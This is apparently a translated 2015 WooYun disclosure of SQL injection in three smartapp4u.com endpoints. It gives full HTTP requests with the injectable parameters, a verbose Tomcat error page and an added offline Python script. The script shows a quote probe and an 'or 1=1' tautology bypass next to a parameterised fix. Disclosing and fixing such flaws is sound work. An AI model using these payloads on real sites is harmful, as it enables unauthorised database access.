Vulnerability summary (followers: 24)
Defect ID: wooyun-2015-0137635
Title: Bundled submission of three MySQL injection points (multiple parameters) on the main site of 精众移动广告联盟 (Jingzhong Mobile Ad Alliance)
Vendor: smartapp4u.com
Author: 路人甲 (anonymous)
Submitted: 2015-08-28 19:03
Fixed: 2015-10-12 23:18
Published: 2015-10-12 23:18
Vulnerability type: SQL injection
Severity: High
Self-assessed rank: 20
Status: Confirmed by vendor
Source: http://www.wooyun.org; for questions or help, contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2015-08-28: Details sent to the vendor; awaiting vendor action
2015-08-28: Vendor confirmed; details visible to the vendor only
2015-09-07: Details disclosed to core white hats and relevant domain experts
2015-09-17: Details disclosed to regular white hats
2015-09-27: Details disclosed to intern white hats
2015-10-12: Details disclosed to the public
Brief description:
Nothing more to say; after all, I submitted three of them. Put it on the front page!
Detailed description:
Just give it a higher rank.
POST /androidService/cpBonus/findAll.h HTTP/1.1
Host: www.smartapp4u.com
Content-Length: 46
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.smartapp4u.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.107 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.smartapp4u.com/androidService/cpBonus/findAll.h
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=2e3c3f90-7611-4ac1-9379-4f29d380cc42; Hm_lvt_a76d47fff46695209cb7130eec29ef19=1440726276; Hm_lpvt_a76d47fff46695209cb7130eec29ef19=1440745546

sort=&beginTime=2015-08-06&endTime=2015-08-11

Parameters beginTime and endTime are injectable.
=============================================
POST /androidService/productUpdate/findAll.h HTTP/1.1
Host: www.smartapp4u.com
Content-Length: 19
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.smartapp4u.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.107 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.smartapp4u.com/androidService/productUpdate/findAll.h
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=2e3c3f90-7611-4ac1-9379-4f29d380cc42; Hm_lvt_a76d47fff46695209cb7130eec29ef19=1440726276; Hm_lpvt_a76d47fff46695209cb7130eec29ef19=1440745546

sort=&productName=1

Parameter productName is injectable.
===========================================
POST /androidService/cpOfAdvertising/findAllAdver.h HTTP/1.1
Host: www.smartapp4u.com
Content-Length: 73
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.smartapp4u.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.107 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.smartapp4u.com/androidService/cpOfAdvertising/toFindAllAdver.h
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=2e3c3f90-7611-4ac1-9379-4f29d380cc42; Hm_lvt_a76d47fff46695209cb7130eec29ef19=1440726276; Hm_lpvt_a76d47fff46695209cb7130eec29ef19=1440745546

sort=&productId=0&adType=chaping&beginTime=2015-08-28&endTime=2015-08-28

Parameters productId, adType, beginTime and endTime are injectable.
=================================================
Response to the cpBonus/findAll.h request with a single quote appended to beginTime. The SQL echoed in the error message shows the quote landing inside the actTime>='...' literal (cpId is bound with a ? placeholder, the two dates are concatenated into the query text). The verbose Tomcat error page also discloses the table name, the application's DAO/service/action class names, the Spring, Shiro and c3p0 stack and the Tomcat version (6.0.36).
HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Date: Fri, 28 Aug 2015 07:29:35 GMT
Connection: close
Content-Length: 12709
Apache Tomcat/6.0.36 - Error report

HTTP Status 500 - Request processing failed; nested exception is org.springframework.jdbc.BadSqlGrammarException: PreparedStatementCallback; bad SQL grammar [select count(1) from (select * from tb_cp_bonus where cpId=? and actTime>='2015-08-06' 00:00:00' and actTime<='2015-08-11 23:59:59' ORDER BY actTime DESC ) maxCount]; nested exception is com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '00:00:00' and actTime<='2015-08-11 23:59:59' ORDER BY actTime DESC ) maxCount' at line 1

type: Exception report

description: The server encountered an internal error that prevented it from fulfilling this request.

exception:
org.springframework.web.util.NestedServletException: Request processing failed; nested exception is org.springframework.jdbc.BadSqlGrammarException: PreparedStatementCallback; bad SQL grammar [select count(1) from (select * from tb_cp_bonus where cpId=? and actTime>='2015-08-06' 00:00:00' and actTime<='2015-08-11 23:59:59' ORDER BY actTime DESC ) maxCount]; nested exception is com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '00:00:00' and actTime<='2015-08-11 23:59:59' ORDER BY actTime DESC ) maxCount' at line 1
org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:656)
org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:560)
javax.servlet.http.HttpServlet.service(HttpServlet.java:637)
javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:88)
org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:76)
org.apache.shiro.web.servlet.AbstractShiroFilter.executeChain(AbstractShiroFilter.java:449)
org.apache.shiro.web.servlet.AbstractShiroFilter$1.call(AbstractShiroFilter.java:365)
org.apache.shiro.subject.support.SubjectCallable.doCall(SubjectCallable.java:90)
org.apache.shiro.subject.support.SubjectCallable.call(SubjectCallable.java:83)
org.apache.shiro.subject.support.DelegatingSubject.execute(DelegatingSubject.java:380)
org.apache.shiro.web.servlet.AbstractShiroFilter.doFilterInternal(AbstractShiroFilter.java:362)
org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
org.springframework.web.filter.DelegatingFilterProxy.invokeDelegate(DelegatingFilterProxy.java:237)
org.springframework.web.filter.DelegatingFilterProxy.doFilter(DelegatingFilterProxy.java:167)
root cause:
org.springframework.jdbc.BadSqlGrammarException: PreparedStatementCallback; bad SQL grammar [select count(1) from (select * from tb_cp_bonus where cpId=? and actTime>='2015-08-06' 00:00:00' and actTime<='2015-08-11 23:59:59' ORDER BY actTime DESC ) maxCount]; nested exception is com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '00:00:00' and actTime<='2015-08-11 23:59:59' ORDER BY actTime DESC ) maxCount' at line 1
org.springframework.jdbc.support.SQLErrorCodeSQLExceptionTranslator.doTranslate(SQLErrorCodeSQLExceptionTranslator.java:233)
org.springframework.jdbc.support.AbstractFallbackSQLExceptionTranslator.translate(AbstractFallbackSQLExceptionTranslator.java:72)
org.springframework.jdbc.core.JdbcTemplate.execute(JdbcTemplate.java:602)
org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:636)
org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:665)
org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:673)
org.springframework.jdbc.core.JdbcTemplate.queryForObject(JdbcTemplate.java:728)
org.springframework.jdbc.core.JdbcTemplate.queryForObject(JdbcTemplate.java:744)
org.springframework.jdbc.core.JdbcTemplate.queryForInt(JdbcTemplate.java:775)
cm.com.android.dao.impl.BaseSupport.getAllPage(BaseSupport.java:15)
cm.com.android.dao.impl.CpBonusDaoImpl.findAllBySplit(CpBonusDaoImpl.java:66)
cm.com.android.service.impl.CpBonusServiceImpl.findAllBySplit(CpBonusServiceImpl.java:39)
cm.com.android.action.CpBonusAction.findAll(CpBonusAction.java:103)
sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
java.lang.reflect.Method.invoke(Method.java:616)
org.springframework.web.bind.annotation.support.HandlerMethodInvoker.invokeHandlerMethod(HandlerMethodInvoker.java:176)
org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.invokeHandlerMethod(AnnotationMethodHandlerAdapter.java:426)
org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.handle(AnnotationMethodHandlerAdapter.java:414)
org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:790)
org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:719)
org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:644)
org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:560)
javax.servlet.http.HttpServlet.service(HttpServlet.java:637)
javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:88)
org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:76)
org.apache.shiro.web.servlet.AbstractShiroFilter.executeChain(AbstractShiroFilter.java:449)
org.apache.shiro.web.servlet.AbstractShiroFilter$1.call(AbstractShiroFilter.java:365)
org.apache.shiro.subject.support.SubjectCallable.doCall(SubjectCallable.java:90)
org.apache.shiro.subject.support.SubjectCallable.call(SubjectCallable.java:83)
org.apache.shiro.subject.support.DelegatingSubject.execute(DelegatingSubject.java:380)
org.apache.shiro.web.servlet.AbstractShiroFilter.doFilterInternal(AbstractShiroFilter.java:362)
org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
org.springframework.web.filter.DelegatingFilterProxy.invokeDelegate(DelegatingFilterProxy.java:237)
org.springframework.web.filter.DelegatingFilterProxy.doFilter(DelegatingFilterProxy.java:167)
root cause:
com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '00:00:00' and actTime<='2015-08-11 23:59:59' ORDER BY actTime DESC ) maxCount' at line 1
sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:57)
sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
java.lang.reflect.Constructor.newInstance(Constructor.java:532)
com.mysql.jdbc.Util.handleNewInstance(Util.java:389)
com.mysql.jdbc.Util.getInstance(Util.java:372)
com.mysql.jdbc.SQLError.createSQLException(SQLError.java:980)
com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:3835)
com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:3771)
com.mysql.jdbc.MysqlIO.sendCommand(MysqlIO.java:2435)
com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:2582)
com.mysql.jdbc.ConnectionImpl.execSQL(ConnectionImpl.java:2535)
com.mysql.jdbc.PreparedStatement.executeInternal(PreparedStatement.java:1911)
com.mysql.jdbc.PreparedStatement.executeQuery(PreparedStatement.java:2034)
com.mchange.v2.c3p0.impl.NewProxyPreparedStatement.executeQuery(NewProxyPreparedStatement.java:76)
org.springframework.jdbc.core.JdbcTemplate$1.doInPreparedStatement(JdbcTemplate.java:643)
org.springframework.jdbc.core.JdbcTemplate.execute(JdbcTemplate.java:586)
org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:636)
org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:665)
org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:673)
org.springframework.jdbc.core.JdbcTemplate.queryForObject(JdbcTemplate.java:728)
org.springframework.jdbc.core.JdbcTemplate.queryForObject(JdbcTemplate.java:744)
org.springframework.jdbc.core.JdbcTemplate.queryForInt(JdbcTemplate.java:775)
cm.com.android.dao.impl.BaseSupport.getAllPage(BaseSupport.java:15)
cm.com.android.dao.impl.CpBonusDaoImpl.findAllBySplit(CpBonusDaoImpl.java:66)
cm.com.android.service.impl.CpBonusServiceImpl.findAllBySplit(CpBonusServiceImpl.java:39)
cm.com.android.action.CpBonusAction.findAll(CpBonusAction.java:103)
sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
java.lang.reflect.Method.invoke(Method.java:616)
org.springframework.web.bind.annotation.support.HandlerMethodInvoker.invokeHandlerMethod(HandlerMethodInvoker.java:176)
org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.invokeHandlerMethod(AnnotationMethodHandlerAdapter.java:426)
org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.handle(AnnotationMethodHandlerAdapter.java:414)
org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:790)
org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:719)
org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:644)
org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:560)
javax.servlet.http.HttpServlet.service(HttpServlet.java:637)
javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:88)
org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:76)
org.apache.shiro.web.servlet.AbstractShiroFilter.executeChain(AbstractShiroFilter.java:449)
org.apache.shiro.web.servlet.AbstractShiroFilter$1.call(AbstractShiroFilter.java:365)
org.apache.shiro.subject.support.SubjectCallable.doCall(SubjectCallable.java:90)
org.apache.shiro.subject.support.SubjectCallable.call(SubjectCallable.java:83)
org.apache.shiro.subject.support.DelegatingSubject.execute(DelegatingSubject.java:380)
org.apache.shiro.web.servlet.AbstractShiroFilter.doFilterInternal(AbstractShiroFilter.java:362)
org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
org.springframework.web.filter.DelegatingFilterProxy.invokeDelegate(DelegatingFilterProxy.java:237)
org.springframework.web.filter.DelegatingFilterProxy.doFilter(DelegatingFilterProxy.java:167)
note: The full stack trace of the root cause is available in the Apache Tomcat/6.0.36 logs.
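The query in the error message is the only application code this report shows, but it is enough to see the defect: cpId is bound with a ? placeholder while beginTime and endTime are spliced into the SQL text inside quoted literals, so a quote in either parameter ends the literal and the rest of the value is parsed as SQL. The script below is an added example, not the reporter's or the vendor's code. It rebuilds that query shape, reproduces the syntax error from the error page with a trailing quote, shows a tautology payload that makes the bound cpId filter irrelevant (rows belonging to another cpId are counted), and contrasts it with a fully parameterised version of the same query. The function names, the sample tb_cp_bonus rows and the use of an in-memory SQLite database in place of MySQL are assumptions made so it runs offline; the original is Java on Spring JdbcTemplate, as the stack trace shows.

```python
"""Injection pattern reconstructed from the Tomcat error page in this report.

Added example, not the reporter's or the vendor's code. The query shape comes
from the error message; function names, sample rows and the in-memory SQLite
database (standing in for MySQL) are assumptions so the script runs offline.
"""
import sqlite3

# Constructed sample data: cpId 7 is the logged-in advertiser, cpId 9 is someone else.
SAMPLE_ROWS = [
    (7, "2015-08-05 12:00:00"),
    (7, "2015-08-07 09:30:00"),
    (7, "2015-08-10 18:45:00"),
    (7, "2015-08-12 01:00:00"),
    (9, "2015-08-08 10:00:00"),
]


def open_db() -> sqlite3.Connection:
    """Create an in-memory tb_cp_bonus table holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table tb_cp_bonus (cpId integer, actTime text)")
    conn.executemany("insert into tb_cp_bonus values (?, ?)", SAMPLE_ROWS)
    return conn


def build_vulnerable_sql(begin_time: str, end_time: str) -> str:
    """Splice the date parameters into quoted literals, as the error page shows.

    Only cpId is bound; everything inside the single quotes is caller-controlled.
    """
    return (
        "select count(1) from (select * from tb_cp_bonus where cpId=? "
        "and actTime>='" + begin_time + " 00:00:00' "
        "and actTime<='" + end_time + " 23:59:59' "
        "ORDER BY actTime DESC ) maxCount"
    )


def count_vulnerable(conn: sqlite3.Connection, cp_id: int, begin_time: str, end_time: str) -> int:
    """Run the spliced query with cpId as the only bind argument."""
    return conn.execute(build_vulnerable_sql(begin_time, end_time), (cp_id,)).fetchone()[0]


def count_fixed(conn: sqlite3.Connection, cp_id: int, begin_time: str, end_time: str) -> int:
    """Bind all three values; user input never becomes SQL text."""
    sql = (
        "select count(1) from (select * from tb_cp_bonus where cpId=? "
        "and actTime>=? and actTime<=? ORDER BY actTime DESC ) maxCount"
    )
    args = (cp_id, begin_time + " 00:00:00", end_time + " 23:59:59")
    return conn.execute(sql, args).fetchone()[0]


def demo() -> dict:
    """Run the legitimate query, the probe from the error page and a bypass
    against both builders, and return the counts so they can be checked."""
    conn = open_db()
    begin, end = "2015-08-06", "2015-08-11"
    probe = "2015-08-06'"               # yields actTime>='2015-08-06' 00:00:00', the page's error
    bypass = "2015-08-06' or 1=1 or '"  # closes the literal, adds a tautology, reopens it
    out = {
        "vulnerable_legit": count_vulnerable(conn, 7, begin, end),
        "fixed_legit": count_fixed(conn, 7, begin, end),
    }
    try:
        count_vulnerable(conn, 7, probe, end)
        out["vulnerable_probe_error"] = False
    except sqlite3.OperationalError:    # SQLite's counterpart of MySQLSyntaxErrorException
        out["vulnerable_probe_error"] = True
    # The tautology makes the WHERE clause true for every row, including cpId 9:
    # the bound cpId placeholder no longer scopes the result to one advertiser.
    out["vulnerable_bypass"] = count_vulnerable(conn, 7, bypass, end)
    # Parameterised: both payloads are compared as plain strings against actTime.
    out["fixed_probe"] = count_fixed(conn, 7, probe, end)
    out["fixed_bypass"] = count_fixed(conn, 7, bypass, end)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it directly to print the counts: the spliced query fails on the lone quote and returns every row for the tautology, while the parameterised query returns the two in-range rows for cpId 7 in all cases because the payloads are only ever compared as strings. In the Spring code path visible in the trace (BaseSupport.getAllPage calling JdbcTemplate.queryForInt) the equivalent fix is to pass beginTime and endTime as bind arguments alongside cpId instead of concatenating them into the SQL string, and to return a generic error page rather than the Tomcat stack trace.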
Proof of vulnerability:
Fix recommendation:
Copyright notice: when reposting, please credit the source: 路人甲@乌云 (WooYun)
Vulnerability response
Vendor response:
Severity: Low
Vulnerability rank: 5
Confirmed: 2015-08-28 23:17
Vendor reply:
Dlovej has already notified us of this vulnerability, but thank you all the same; we also ask everyone not to submit duplicate reports for this vulnerability.
Latest status:
None yet